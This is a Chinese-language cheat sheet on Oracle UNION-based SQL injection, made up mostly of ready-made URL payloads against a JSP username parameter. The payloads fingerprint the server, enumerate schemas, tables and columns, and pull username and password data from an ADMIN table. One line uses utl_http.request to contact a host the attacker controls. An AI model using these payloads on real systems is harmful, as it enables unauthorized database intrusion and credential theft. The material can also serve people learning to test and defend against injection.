## 注释符号
`-- ` （两个连字符加空格）单行注释；`/* */` 多行注释。在 URL 中通常写成 `-- -` 或 `--+`，保证 `--` 后面有一个空格。

### 判断是否注入

`and 1=1 -- -` 与 `and 1=2 -- -` 返回结果不同即可能存在注入。

### 判断列数

`order by x -- -`（x 从 1 递增，直到报错；最后一个不报错的 x 即列数）。

### 联合查询

因为 Oracle 对列的类型比较严谨，所以 union 的各列要用 `null` 占位，`null` 可以匹配任意类型。Oracle 中的 `dual` 表是一个单行单列的虚拟表，`dual` 是 Oracle 中实际存在的表，任何用户均可读取，所以可以通过 `dual` 表来验证列数（`null` 的个数必须与 order by 得到的列数一致，下面的示例以 8 列为例）：

```
a.jsp?username=SMITH' union select null,null,null,null,null,null,null,null from dual -- -
```

### 获取 Oracle 信息

以下案例中 `dual` 为表名。注意：`v$version`、`v$instance`、`v$logfile` 等动态性能视图以及 `utl_http`、`utl_inaddr` 包都需要相应权限，低权限账号可能查不到；`all_*` 视图只显示当前用户有权访问的对象。

- 当前用户权限：`select * from session_roles`
- 当前数据库版本：`select banner from sys.v$version where rownum = 1`
- 服务器出口 IP：`select utl_http.request('http://<你控制的主机>/') from dual`，在自己的主机上观察请求来源 IP（11g 起还需要网络 ACL 授权）
- 服务器监听 IP：`select utl_inaddr.get_host_address from dual`
- 服务器操作系统：`select member from v$logfile where rownum = 1`（由日志文件的路径格式推断）
- 服务器 SID：`select instance_name from v$instance`
- 当前连接用户：`select SYS_CONTEXT('USERENV','CURRENT_USER') from dual`
- 查询日志文件：`select member from v$logfile where rownum = 1`
- 当前用户：`select user from dual`
- 列出所有用户：`select username from all_users order by username`
- 列出数据库（schema）：`select distinct owner from all_tables`

### 查询库名

```
99' union select null,null,(select owner from all_tables where rownum=1),null,null,null,null,null from dual -- -
99' union select null,null,(select owner from all_tables where rownum=1 and owner <> 'SYS'),null,null,null,null,null from dual -- -
```

通过不断追加 `and owner <> '已知名'` 逐个枚举。

### 查询表

表名一定要用大写（Oracle 数据字典中未加引号的标识符统一存为大写）：

```
a.jsp?username=SMITH' union select null,null,(select table_name from user_tables where rownum=1),null,null,null,null,null from dual -- -
a.jsp?username=SMITH' union select null,null,(select table_name from user_tables where rownum=1 and table_name <> 'ADMIN'),null,null,null,null,null from dual -- -
```

### 查询列

查询表 ADMIN 的第一个列：

```
a.jsp?username=SMITH' union select null,(select column_name from user_tab_columns where table_name='ADMIN' and rownum=1),null,null,null,null,null,null from dual -- -
```

查询表 ADMIN 的第二个列：

```
a.jsp?username=SMITH' union select null,(select column_name from user_tab_columns where table_name='ADMIN' and column_name <> 'ID' and rownum=1),null,null,null,null,null,null from dual -- -
```

### 查询数据

```
a.jsp?username=SMITH' union select null,(select concat(USERNAME,PASSWORD) from ADMIN where rownum=1),null,null,null,null,null,null from dual -- -
```

注意：标量子查询只能返回一行，如果 ADMIN 表有多条记录而不加 `rownum=1` 会报 ORA-01427 错误；可以像枚举表名一样用 `and USERNAME <> '已知值'` 逐行取出。